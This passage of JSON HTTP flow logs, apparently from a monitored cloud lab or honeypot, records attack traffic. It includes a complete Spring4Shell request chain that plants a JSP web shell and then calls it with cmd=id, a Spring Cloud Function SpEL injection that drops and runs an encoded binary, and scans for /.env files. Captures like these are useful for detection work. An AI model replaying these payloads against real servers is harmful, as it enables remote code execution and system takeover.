text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9\r\nAccept-Encoding: gzip, deflate\r\nAccept-Language: en-US,en;q=0.9\r\n\r\n","src_ip":"75.174.190.242","src_mac":"02:A5:92:DA:49:85","src_port":58970,"status":200,"time_taken":86116,"transport":"tcp","uri":"/shell.jsp?cmd=id","uri_path":"/shell.jsp","uri_query":"cmd=id"} {"endtime":"2022-04-06T13:41:12.242332Z","timestamp":"2022-04-06T13:41:12.239299Z","bytes":649,"bytes_in":310,"bytes_out":339,"cs_content_length":73,"cs_content_type":"application/x-www-form-urlencoded","dest_content":"\n\n\n \n Reznok's Hello World Spring Application\n\n\n Hello World! Exploit me!\n\n","dest_headers":"HTTP/1.1 200 \r\nContent-Type: text/html;charset=UTF-8\r\nContent-Language: en\r\nTransfer-Encoding: chunked\r\nDate: Wed, 06 Apr 2022 13:41:12 GMT\r\n\r\n","dest_ip":"10.0.1.20","dest_mac":"02:9E:53:65:4C:5F","dest_port":8080,"file_size":[73,185],"flow_id":"2934befd-3691-439d-915e-5fd64a42f707","form_data":"class.module.classLoader.resources.context.parent.pipeline.first.pattern=","http_comment":"HTTP/1.1 200 ","http_content_type":"text/html;charset=UTF-8","http_method":"POST","http_user_agent":"python-requests/2.25.1","mime_type":["application/x-www-form-urlencoded","text/html"],"protocol_stack":"ip:tcp:http","request":"POST /helloworld/greeting HTTP/1.1","site":"54.218.192.0:8080","src_content":"class.module.classLoader.resources.context.parent.pipeline.first.pattern=","src_headers":"POST /helloworld/greeting HTTP/1.1\r\nHost: 54.218.192.0:8080\r\nUser-Agent: python-requests/2.25.1\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nConnection: keep-alive\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 73\r\n\r\n","src_ip":"54.188.59.68","src_mac":"02:A5:92:DA:49:85","src_port":48990,"status":200,"time_taken":3323,"transport":"tcp","uri":"/helloworld/greeting","uri_path":"/helloworld/greeting"} {"endtime":"2022-04-06T13:41:11.235765Z","timestamp":"2022-04-06T13:41:11.233080Z","bytes":544,"bytes_in":205,"bytes_out":339,"dest_content":"\n\n\n \n Reznok's Hello World Spring Application\n\n\n Hello World! Exploit me!\n\n","dest_headers":"HTTP/1.1 200 \r\nContent-Type: text/html;charset=UTF-8\r\nContent-Language: en\r\nTransfer-Encoding: chunked\r\nDate: Wed, 06 Apr 2022 13:41:11 GMT\r\n\r\n","dest_ip":"10.0.1.20","dest_mac":"02:9E:53:65:4C:5F","dest_port":8080,"file_size":185,"flow_id":"3209b7dc-0b3f-4be2-828c-fe238da8f30c","http_comment":"HTTP/1.1 200 ","http_content_type":"text/html;charset=UTF-8","http_method":"GET","http_user_agent":"python-requests/2.25.1","mime_type":"text/html","protocol_stack":"ip:tcp:http","request":"GET /helloworld/greeting HTTP/1.1","site":"54.218.192.0:8080","src_headers":"GET /helloworld/greeting HTTP/1.1\r\nHost: 54.218.192.0:8080\r\nUser-Agent: python-requests/2.25.1\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nConnection: keep-alive\r\nprefix: <%\r\nsuffix: %>//\r\nc: Runtime\r\n\r\n","src_ip":"54.188.59.68","src_mac":"02:A5:92:DA:49:85","src_port":48988,"status":200,"time_taken":2968,"transport":"tcp","uri":"/helloworld/greeting","uri_path":"/helloworld/greeting"} {"endtime":"2022-04-06T13:41:08.227551Z","timestamp":"2022-04-06T13:41:08.224415Z","bytes":1275,"bytes_in":936,"bytes_out":339,"cs_content_length":698,"cs_content_type":"application/x-www-form-urlencoded","dest_content":"\n\n\n \n Reznok's Hello World Spring Application\n\n\n Hello World! Exploit me!\n\n","dest_headers":"HTTP/1.1 200 \r\nContent-Type: text/html;charset=UTF-8\r\nContent-Language: en\r\nTransfer-Encoding: chunked\r\nDate: Wed, 06 Apr 2022 13:41:08 GMT\r\n\r\n","dest_ip":"10.0.1.20","dest_mac":"02:9E:53:65:4C:5F","dest_port":8080,"file_size":[698,185],"flow_id":"5522821c-731b-4ea9-8e37-c68c2b09e1e4","form_data":"class.module.classLoader.resources.context.parent.pipeline.first.pattern=%{prefix}i java.io.InputStream in = %{c}i.getRuntime().exec(request.getParameter(\"cmd\")).getInputStream(); int a = -1; byte[] b = new byte[2048]; while((a=in.read(b))!=-1){ out.println(new String(b)); } %{suffix}i&class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp&class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps/ROOT&class.module.classLoader.resources.context.parent.pipeline.first.prefix=shell&class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat=","http_comment":"HTTP/1.1 200 ","http_content_type":"text/html;charset=UTF-8","http_method":"POST","http_user_agent":"python-requests/2.25.1","mime_type":["application/x-www-form-urlencoded","text/html"],"protocol_stack":"ip:tcp:http","request":"POST /helloworld/greeting HTTP/1.1","site":"54.218.192.0:8080","src_content":"class.module.classLoader.resources.context.parent.pipeline.first.pattern=%25%7Bprefix%7Di%20java.io.InputStream%20in%20%3D%20%25%7Bc%7Di.getRuntime().exec(request.getParameter(%22cmd%22)).getInputStream()%3B%20int%20a%20%3D%20-1%3B%20byte%5B%5D%20b%20%3D%20new%20byte%5B2048%5D%3B%20while((a%3Din.read(b))!%3D-1)%7B%20out.println(new%20String(b))%3B%20%7D%20%25%7Bsuffix%7Di&class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp&class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps/ROOT&class.module.classLoader.resources.context.parent.pipeline.first.prefix=shell&class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat=","src_headers":"POST /helloworld/greeting HTTP/1.1\r\nHost: 54.218.192.0:8080\r\nUser-Agent: python-requests/2.25.1\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nConnection: keep-alive\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 698\r\n\r\n","src_ip":"54.188.59.68","src_mac":"02:A5:92:DA:49:85","src_port":48986,"status":200,"time_taken":3446,"transport":"tcp","uri":"/helloworld/greeting","uri_path":"/helloworld/greeting"} {"endtime":"2022-04-06T13:41:08.222172Z","timestamp":"2022-04-06T13:41:08.218353Z","bytes":657,"bytes_in":318,"bytes_out":339,"cs_content_length":81,"cs_content_type":"application/x-www-form-urlencoded","dest_content":"\n\n\n \n Reznok's Hello World Spring Application\n\n\n Hello World! Exploit me!\n\n","dest_headers":"HTTP/1.1 200 \r\nContent-Type: text/html;charset=UTF-8\r\nContent-Language: en\r\nTransfer-Encoding: chunked\r\nDate: Wed, 06 Apr 2022 13:41:08 GMT\r\n\r\n","dest_ip":"10.0.1.20","dest_mac":"02:9E:53:65:4C:5F","dest_port":8080,"file_size":[81,185],"flow_id":"bad20eed-e374-4d6b-b5d1-f7010cc71384","form_data":"class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat=_","http_comment":"HTTP/1.1 200 ","http_content_type":"text/html;charset=UTF-8","http_method":"POST","http_user_agent":"python-requests/2.25.1","mime_type":["application/x-www-form-urlencoded","text/html"],"protocol_stack":"ip:tcp:http","request":"POST /helloworld/greeting HTTP/1.1","site":"54.218.192.0:8080","src_content":"class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat=_","src_headers":"POST /helloworld/greeting HTTP/1.1\r\nHost: 54.218.192.0:8080\r\nUser-Agent: python-requests/2.25.1\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nConnection: keep-alive\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 81\r\n\r\n","src_ip":"54.188.59.68","src_mac":"02:A5:92:DA:49:85","src_port":48984,"status":200,"time_taken":4108,"transport":"tcp","uri":"/helloworld/greeting","uri_path":"/helloworld/greeting"} {"endtime":"2022-04-06T13:39:12.511583Z","timestamp":"2022-04-06T13:39:12.432023Z","bytes":1454,"bytes_in":1210,"bytes_out":244,"cs_content_length":0,"cs_content_type":"application/x-www-form-urlencoded","dest_content":"{\"timestamp\":\"2022-04-06T13:39:12.501+00:00\",\"path\":\"/functionRouter\",\"status\":500,\"error\":\"Internal Server Error\",\"message\":\"\",\"requestId\":\"99df1107-1\"}","dest_headers":"HTTP/1.1 500 Internal Server Error\r\nContent-Type: application/json\r\nContent-Length: 153\r\n\r\n","dest_ip":"10.0.1.20","dest_mac":"02:9E:53:65:4C:5F","dest_port":9000,"file_size":153,"flow_id":"5ee97ec3-55ce-4d1e-8a41-d5925fc9b9a5","http_comment":"HTTP/1.1 500 Internal Server Error","http_content_length":153,"http_content_type":"application/json","http_method":"POST","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.81 Safari/537.36","mime_type":["application/x-www-form-urlencoded","application/json"],"protocol_stack":"ip:tcp:http","request":"POST /functionRouter HTTP/1.1","site":"54.218.192.0:9000","src_headers":"POST /functionRouter HTTP/1.1\r\nHost: 54.218.192.0:9000\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.81 Safari/537.36\r\nspring.cloud.function.routing-expression: T(java.lang.Runtime).getRuntime().exec(new String[]{'/bin/sh','-c','echo -n f0VMRgIBAQAAAAAAAAAAAAIAPgABAAAAeABAAAAAAABAAAAAAAAAAAAAAAAAAAAAAAAAAEAAOAABAAAAAAAAAAEAAAAHAAAAAAAAAAAAAAAAAEAAAAAAAAAAQAAAAAAA+gAAAAAAAAB8AQAAAAAAAAAQAAAAAAAASDH/aglYmbYQSInWTTHJaiJBWrIHDwVIhcB4UWoKQVlQailYmWoCX2oBXg8FSIXAeDtIl0i5AgARXDa8O0RRSInmahBaaipYDwVZSIXAeSVJ/8l0GFdqI1hqAGoFSInnSDH2DwVZWV9IhcB5x2o8WGoBXw8FXmp+Wg8FSIXAeO3/5g==>>''/tmp/hbMTK.b64'' ; ((which base64 >&2 && base64 -d -) || (which base64 >&2 && base64 --decode -) || (which openssl >&2 && openssl enc -d -A -base64 -in /dev/stdin) || (which python >&2 && python -c ''import sys, base64; print base64.standard_b64decode(sys.stdin.read());'') || (which perl >&2 && perl -MMIME::Base64 -ne ''print decode_base64($_)'')) 2> /dev/null > ''/tmp/mBZXM'' < ''/tmp/hbMTK.b64'' ; chmod +x ''/tmp/mBZXM'' ; ''/tmp/mBZXM'' ; rm -f ''/tmp/mBZXM'' ; rm -f ''/tmp/hbMTK.b64'''})\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 0\r\n\r\n","src_ip":"54.188.59.68","src_mac":"02:A5:92:DA:49:85","src_port":41019,"status":500,"time_taken":79853,"transport":"tcp","uri":"/functionRouter","uri_path":"/functionRouter"} {"endtime":"2022-04-06T13:39:12.425085Z","timestamp":"2022-04-06T13:39:12.128492Z","bytes":498,"bytes_in":254,"bytes_out":244,"cs_content_length":0,"cs_content_type":"application/x-www-form-urlencoded","dest_content":"{\"timestamp\":\"2022-04-06T13:39:12.358+00:00\",\"path\":\"/functionRouter\",\"status\":500,\"error\":\"Internal Server Error\",\"message\":\"\",\"requestId\":\"decd6a3c-1\"}","dest_headers":"HTTP/1.1 500 Internal Server Error\r\nContent-Type: application/json\r\nContent-Length: 153\r\n\r\n","dest_ip":"10.0.1.20","dest_mac":"02:9E:53:65:4C:5F","dest_port":9000,"file_size":153,"flow_id":"eaf6e199-559b-45a7-9504-718ff5d991eb","http_comment":"HTTP/1.1 500 Internal Server Error","http_content_length":153,"http_content_type":"application/json","http_method":"POST","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.81 Safari/537.36","mime_type":["application/x-www-form-urlencoded","application/json"],"protocol_stack":"ip:tcp:http","request":"POST /functionRouter HTTP/1.1","site":"54.218.192.0:9000","src_headers":"POST /functionRouter HTTP/1.1\r\nHost: 54.218.192.0:9000\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.81 Safari/537.36\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 0\r\n\r\n","src_ip":"54.188.59.68","src_mac":"02:A5:92:DA:49:85","src_port":37787,"status":500,"time_taken":296873,"transport":"tcp","uri":"/functionRouter","uri_path":"/functionRouter"} {"endtime":"2022-04-06T13:11:42.458073Z","timestamp":"2022-04-06T13:11:42.457766Z","bytes":773,"bytes_in":246,"bytes_out":527,"dest_content":"\n\n\n \n 404 - Not Found\n \n \n

404 - Not Found

\n \n\n","dest_headers":"HTTP/1.1 404 Not Found\r\nX-Aws-Ec2-Metadata-Token-Ttl-Seconds: 10800\r\nContent-Type: text/html\r\nContent-Length: 339\r\nDate: Wed, 06 Apr 2022 13:11:42 GMT\r\nServer: EC2ws\r\nConnection: close\r\n\r\n","dest_ip":"169.254.169.254","dest_mac":"02:A5:92:DA:49:85","dest_port":80,"file_size":339,"flow_id":"597b628e-faa5-4e00-90b6-427619e125e7","http_comment":"HTTP/1.1 404 Not Found","http_content_length":339,"http_content_type":"text/html","http_method":"GET","http_user_agent":"aws-sdk-go/1.41.4 (go1.16.8; linux; amd64)","mime_type":"text/html","protocol_stack":"ip:tcp:http","request":"GET /latest/meta-data/iam/security-credentials/ HTTP/1.1","server":"EC2ws","site":"169.254.169.254","src_headers":"GET /latest/meta-data/iam/security-credentials/ HTTP/1.1\r\nHost: 169.254.169.254\r\nUser-Agent: aws-sdk-go/1.41.4 (go1.16.8; linux; amd64)\r\nX-Aws-Ec2-Metadata-Token: AQAEANi0rloMtAuWJAl8x8Rj_euHzV1DshFLTPF3NylS3DiUUO0SLg==\r\nAccept-Encoding: gzip\r\n\r\n","src_ip":"10.0.1.21","src_mac":"02:8E:79:92:C3:CD","src_port":45748,"status":404,"time_taken":320,"transport":"tcp","uri":"/latest/meta-data/iam/security-credentials/","uri_path":"/latest/meta-data/iam/security-credentials/"} {"endtime":"2022-04-06T13:11:42.456378Z","timestamp":"2022-04-06T13:11:42.455602Z","bytes":497,"bytes_in":236,"bytes_out":261,"dest_content":"amazonaws.com","dest_headers":"HTTP/1.1 200 OK\r\nX-Aws-Ec2-Metadata-Token-Ttl-Seconds: 10800\r\nContent-Type: text/plain\r\nAccept-Ranges: none\r\nLast-Modified: Wed, 06 Apr 2022 12:19:37 GMT\r\nContent-Length: 13\r\nDate: Wed, 06 Apr 2022 13:11:42 GMT\r\nServer: EC2ws\r\nConnection: close\r\n\r\n","dest_ip":"169.254.169.254","dest_mac":"02:A5:92:DA:49:85","dest_port":80,"file_size":13,"flow_id":"35175e97-caf5-43c9-acb3-48afd3036adc","http_comment":"HTTP/1.1 200 OK","http_content_length":13,"http_content_type":"text/plain","http_method":"GET","http_user_agent":"aws-sdk-go/1.41.4 (go1.16.8; linux; amd64)","mime_type":"text/plain","protocol_stack":"ip:tcp:http","request":"GET /latest/meta-data/services/domain HTTP/1.1","server":"EC2ws","site":"169.254.169.254","src_headers":"GET /latest/meta-data/services/domain HTTP/1.1\r\nHost: 169.254.169.254\r\nUser-Agent: aws-sdk-go/1.41.4 (go1.16.8; linux; amd64)\r\nX-Aws-Ec2-Metadata-Token: AQAEANi0rlpISY2KKWq4mdAIyZ2OUwoXcHsMFj0Jl1Jpcr8sQ60VEw==\r\nAccept-Encoding: gzip\r\n\r\n","src_ip":"10.0.1.21","src_mac":"02:8E:79:92:C3:CD","src_port":45746,"status":200,"time_taken":801,"transport":"tcp","uri":"/latest/meta-data/services/domain","uri_path":"/latest/meta-data/services/domain"} {"endtime":"2022-04-06T13:02:06.088192Z","timestamp":"2022-04-06T13:02:06.087794Z","bytes":772,"bytes_in":246,"bytes_out":526,"dest_content":"\n\n\n \n 404 - Not Found\n \n \n

404 - Not Found

\n \n\n","dest_headers":"HTTP/1.1 404 Not Found\r\nX-Aws-Ec2-Metadata-Token-Ttl-Seconds: 7200\r\nContent-Type: text/html\r\nContent-Length: 339\r\nDate: Wed, 06 Apr 2022 13:02:06 GMT\r\nServer: EC2ws\r\nConnection: close\r\n\r\n","dest_ip":"169.254.169.254","dest_mac":"02:A5:92:DA:49:85","dest_port":80,"file_size":339,"flow_id":"2ae8bd2f-6927-4dc9-98b2-06f1e95134e7","http_comment":"HTTP/1.1 404 Not Found","http_content_length":339,"http_content_type":"text/html","http_method":"GET","http_user_agent":"aws-sdk-go/1.41.4 (go1.16.8; linux; amd64)","mime_type":"text/html","protocol_stack":"ip:tcp:http","request":"GET /latest/meta-data/iam/security-credentials/ HTTP/1.1","server":"EC2ws","site":"169.254.169.254","src_headers":"GET /latest/meta-data/iam/security-credentials/ HTTP/1.1\r\nHost: 169.254.169.254\r\nUser-Agent: aws-sdk-go/1.41.4 (go1.16.8; linux; amd64)\r\nX-Aws-Ec2-Metadata-Token: AQAEAN81uSLZfJzGNUbrTUti8Zb5YD247x8VWDVEKvfIraEJi4klLw==\r\nAccept-Encoding: gzip\r\n\r\n","src_ip":"10.0.1.12","src_mac":"02:3E:49:33:B8:B5","src_port":52326,"status":404,"time_taken":414,"transport":"tcp","uri":"/latest/meta-data/iam/security-credentials/","uri_path":"/latest/meta-data/iam/security-credentials/"} {"endtime":"2022-04-06T13:02:06.087347Z","timestamp":"2022-04-06T13:02:06.086972Z","bytes":496,"bytes_in":236,"bytes_out":260,"dest_content":"amazonaws.com","dest_headers":"HTTP/1.1 200 OK\r\nX-Aws-Ec2-Metadata-Token-Ttl-Seconds: 7200\r\nContent-Type: text/plain\r\nAccept-Ranges: none\r\nLast-Modified: Wed, 06 Apr 2022 12:09:21 GMT\r\nContent-Length: 13\r\nDate: Wed, 06 Apr 2022 13:02:06 GMT\r\nServer: EC2ws\r\nConnection: close\r\n\r\n","dest_ip":"169.254.169.254","dest_mac":"02:A5:92:DA:49:85","dest_port":80,"file_size":13,"flow_id":"5e61b2e5-8ec9-431c-8083-60fe24ff84be","http_comment":"HTTP/1.1 200 OK","http_content_length":13,"http_content_type":"text/plain","http_method":"GET","http_user_agent":"aws-sdk-go/1.41.4 (go1.16.8; linux; amd64)","mime_type":"text/plain","protocol_stack":"ip:tcp:http","request":"GET /latest/meta-data/services/domain HTTP/1.1","server":"EC2ws","site":"169.254.169.254","src_headers":"GET /latest/meta-data/services/domain HTTP/1.1\r\nHost: 169.254.169.254\r\nUser-Agent: aws-sdk-go/1.41.4 (go1.16.8; linux; amd64)\r\nX-Aws-Ec2-Metadata-Token: AQAEAN81uSKZ6fg3H_1GamlMDi7Jt2PNf64_KawmSZpeVPosNbaOJA==\r\nAccept-Encoding: gzip\r\n\r\n","src_ip":"10.0.1.12","src_mac":"02:3E:49:33:B8:B5","src_port":52324,"status":200,"time_taken":399,"transport":"tcp","uri":"/latest/meta-data/services/domain","uri_path":"/latest/meta-data/services/domain"} {"endtime":"2022-04-06T13:01:59.877662Z","timestamp":"2022-04-06T13:01:59.877463Z","bytes":772,"bytes_in":246,"bytes_out":526,"dest_content":"\n\n\n \n 404 - Not Found\n \n \n

404 - Not Found

\n \n\n","dest_headers":"HTTP/1.1 404 Not Found\r\nX-Aws-Ec2-Metadata-Token-Ttl-Seconds: 7200\r\nContent-Type: text/html\r\nContent-Length: 339\r\nDate: Wed, 06 Apr 2022 13:01:59 GMT\r\nServer: EC2ws\r\nConnection: close\r\n\r\n","dest_ip":"169.254.169.254","dest_mac":"02:A5:92:DA:49:85","dest_port":80,"file_size":339,"flow_id":"aaaf1333-eb68-4107-b5ea-b3f4747a7da0","http_comment":"HTTP/1.1 404 Not Found","http_content_length":339,"http_content_type":"text/html","http_method":"GET","http_user_agent":"aws-sdk-go/1.41.4 (go1.16.8; linux; amd64)","mime_type":"text/html","protocol_stack":"ip:tcp:http","request":"GET /latest/meta-data/iam/security-credentials/ HTTP/1.1","server":"EC2ws","site":"169.254.169.254","src_headers":"GET /latest/meta-data/iam/security-credentials/ HTTP/1.1\r\nHost: 169.254.169.254\r\nUser-Agent: aws-sdk-go/1.41.4 (go1.16.8; linux; amd64)\r\nX-Aws-Ec2-Metadata-Token: AQAEAJg5ncwbAd8hTtV4ikA0C_u2Uw73ddUQYOJwA77j_1jPbtBDnA==\r\nAccept-Encoding: gzip\r\n\r\n","src_ip":"10.0.1.20","src_mac":"02:9E:53:65:4C:5F","src_port":51438,"status":404,"time_taken":216,"transport":"tcp","uri":"/latest/meta-data/iam/security-credentials/","uri_path":"/latest/meta-data/iam/security-credentials/"} {"endtime":"2022-04-06T13:01:59.876878Z","timestamp":"2022-04-06T13:01:59.876611Z","bytes":496,"bytes_in":236,"bytes_out":260,"dest_content":"amazonaws.com","dest_headers":"HTTP/1.1 200 OK\r\nX-Aws-Ec2-Metadata-Token-Ttl-Seconds: 7200\r\nContent-Type: text/plain\r\nAccept-Ranges: none\r\nLast-Modified: Wed, 06 Apr 2022 12:44:53 GMT\r\nContent-Length: 13\r\nDate: Wed, 06 Apr 2022 13:01:59 GMT\r\nServer: EC2ws\r\nConnection: close\r\n\r\n","dest_ip":"169.254.169.254","dest_mac":"02:A5:92:DA:49:85","dest_port":80,"file_size":13,"flow_id":"877f02c5-ba54-46b8-86e9-e625ad3e54b7","http_comment":"HTTP/1.1 200 OK","http_content_length":13,"http_content_type":"text/plain","http_method":"GET","http_user_agent":"aws-sdk-go/1.41.4 (go1.16.8; linux; amd64)","mime_type":"text/plain","protocol_stack":"ip:tcp:http","request":"GET /latest/meta-data/services/domain HTTP/1.1","server":"EC2ws","site":"169.254.169.254","src_headers":"GET /latest/meta-data/services/domain HTTP/1.1\r\nHost: 169.254.169.254\r\nUser-Agent: aws-sdk-go/1.41.4 (go1.16.8; linux; amd64)\r\nX-Aws-Ec2-Metadata-Token: AQAEAJg5ncw46gaJ13Iw95CL8G0HE0gZENKG-L55q-LhIEppH1CBWw==\r\nAccept-Encoding: gzip\r\n\r\n","src_ip":"10.0.1.20","src_mac":"02:9E:53:65:4C:5F","src_port":51436,"status":200,"time_taken":307,"transport":"tcp","uri":"/latest/meta-data/services/domain","uri_path":"/latest/meta-data/services/domain"} {"endtime":"2022-04-06T13:01:13.529921Z","timestamp":"2022-04-06T13:01:13.529921Z","bytes":204,"bytes_in":204,"bytes_out":0,"dest_ip":"10.0.1.21","dest_mac":"02:8E:79:92:C3:CD","dest_port":80,"flow_id":"523d1021-038b-4d38-9f3b-f2b773c1166a","http_method":"GET","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.131 Safari/537.36","protocol_stack":"ip:tcp:http","request":"GET / HTTP/1.1","site":"35.84.123.246","src_headers":"GET / HTTP/1.1\r\nHost: 35.84.123.246\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.131 Safari/537.36\r\nAccept: */*\r\nAccept-Encoding: gzip\r\n\r\n","src_ip":"71.6.232.4","src_mac":"02:A5:92:DA:49:85","src_port":58310,"time_taken":33104,"transport":"tcp","uri":"/","uri_path":"/"} {"endtime":"2022-04-06T12:59:42.772279Z","timestamp":"2022-04-06T12:59:42.772279Z","bytes":231,"bytes_in":231,"bytes_out":0,"dest_ip":"10.0.1.21","dest_mac":"02:8E:79:92:C3:CD","dest_port":80,"flow_id":"fbe07a9b-0256-4e36-9cb9-462a0038f18b","http_method":"GET","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36","protocol_stack":"ip:tcp:http","request":"GET /.env HTTP/1.1","site":"35.84.123.246","src_headers":"GET /.env HTTP/1.1\r\nHost: 35.84.123.246\r\nUser-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nConnection: keep-alive\r\n\r\n","src_ip":"185.254.196.115","src_mac":"02:A5:92:DA:49:85","src_port":49348,"time_taken":169068,"transport":"tcp","uri":"/.env","uri_path":"/.env"} {"endtime":"2022-04-06T12:59:14.804572Z","timestamp":"2022-04-06T12:59:14.804572Z","bytes":205,"bytes_in":205,"bytes_out":0,"dest_ip":"10.0.1.21","dest_mac":"02:8E:79:92:C3:CD","dest_port":80,"flow_id":"6775e369-57eb-4dda-8bf0-ab500cf6aafe","http_method":"GET","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 ","protocol_stack":"ip:tcp:http","request":"GET / HTTP/1.1","site":"35.84.123.246","src_headers":"GET / HTTP/1.1\r\nHost: 35.84.123.246\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 \r\nAccept: */*\r\nAccept-Encoding: gzip\r\n\r\n","src_ip":"193.118.53.210","src_mac":"02:A5:92:DA:49:85","src_port":44470,"time_taken":141375,"transport":"tcp","uri":"/","uri_path":"/"} {"endtime":"2022-04-06T12:41:00.406100Z","timestamp":"2022-04-06T12:41:00.406100Z","bytes":231,"bytes_in":231,"bytes_out":0,"dest_ip":"10.0.1.21","dest_mac":"02:8E:79:92:C3:CD","dest_port":80,"flow_id":"90b91562-0de6-460c-a0cf-34d3793d6e4f","http_method":"GET","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36","protocol_stack":"ip:tcp:http","request":"GET /.env HTTP/1.1","site":"35.84.123.246","src_headers":"GET /.env HTTP/1.1\r\nHost: 35.84.123.246\r\nUser-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nConnection: keep-alive\r\n\r\n","src_ip":"185.254.196.218","src_mac":"02:A5:92:DA:49:85","src_port":49238,"time_taken":192933,"transport":"tcp","uri":"/.env","uri_path":"/.env"} {"endtime":"2022-04-06T12:27:27.964232Z","timestamp":"2022-04-06T12:27:27.964232Z","bytes":181,"bytes_in":181,"bytes_out":0,"dest_ip":"10.0.1.21","dest_mac":"02:8E:79:92:C3:CD","dest_port":80,"flow_id":"dbb9d065-5c6d-48ae-883f-d8e835401de0","http_method":"GET","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64; rv:73.0) Gecko/20100101 Firefox/73.0","protocol_stack":"ip:tcp:http","request":"GET / HTTP/1.1","site":"35.84.123.246","src_headers":"GET / HTTP/1.1\r\nHost: 35.84.123.246\r\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:73.0) Gecko/20100101 Firefox/73.0\r\nAccept: */*\r\nConnection: keep-alive\r\nAccept-Encoding: gzip\r\n\r\n","src_ip":"161.35.191.96","src_mac":"02:A5:92:DA:49:85","src_port":58494,"time_taken":85486,"transport":"tcp","uri":"/","uri_path":"/"} {"endtime":"2022-04-06T12:17:52.312533Z","timestamp":"2022-04-06T12:17:52.312533Z","bytes":113,"bytes_in":113,"bytes_out":0,"dest_ip":"10.0.1.21","dest_mac":"02:8E:79:92:C3:CD","dest_port":80,"flow_id":"6e1fda7c-4ad0-469d-beee-1069cdbf239c","http_method":"GET","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64; rv:73.0) Gecko/20100101 Firefox/73.0","protocol_stack":"ip:tcp:http","request":"GET / HTTP/1.0","src_headers":"GET / HTTP/1.0\r\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:73.0) Gecko/20100101 Firefox/73.0\r\nAccept: */*\r\n\r\n","src_ip":"161.35.191.96","src_mac":"02:A5:92:DA:49:85","src_port":20000,"time_taken":0,"transport":"tcp","uri":"/","uri_path":"/"} {"endtime":"2022-04-06T12:17:42.222573Z","timestamp":"2022-04-06T12:17:42.222573Z","bytes":113,"bytes_in":113,"bytes_out":0,"dest_ip":"10.0.1.21","dest_mac":"02:8E:79:92:C3:CD","dest_port":80,"flow_id":"6e1fda7c-4ad0-469d-beee-1069cdbf239c","http_method":"GET","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64; rv:73.0) Gecko/20100101 Firefox/73.0","protocol_stack":"ip:tcp:http","request":"GET / HTTP/1.0","src_headers":"GET / HTTP/1.0\r\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:73.0) Gecko/20100101 Firefox/73.0\r\nAccept: */*\r\n\r\n","src_ip":"161.35.191.96","src_mac":"02:A5:92:DA:49:85","src_port":20000,"time_taken":0,"transport":"tcp","uri":"/","uri_path":"/"} {"endtime":"2022-04-06T12:17:31.132998Z","timestamp":"2022-04-06T12:17:31.132998Z","bytes":113,"bytes_in":113,"bytes_out":0,"dest_ip":"10.0.1.21","dest_mac":"02:8E:79:92:C3:CD","dest_port":80,"flow_id":"6e1fda7c-4ad0-469d-beee-1069cdbf239c","http_method":"GET","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64; rv:73.0) Gecko/20100101 Firefox/73.0","protocol_stack":"ip:tcp:http","request":"GET / HTTP/1.0","src_headers":"GET / HTTP/1.0\r\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:73.0) Gecko/20100101 Firefox/73.0\r\nAccept: */*\r\n\r\n","src_ip":"161.35.191.96","src_mac":"02:A5:92:DA:49:85","src_port":20000,"time_taken":86566,"transport":"tcp","uri":"/","uri_path":"/"} 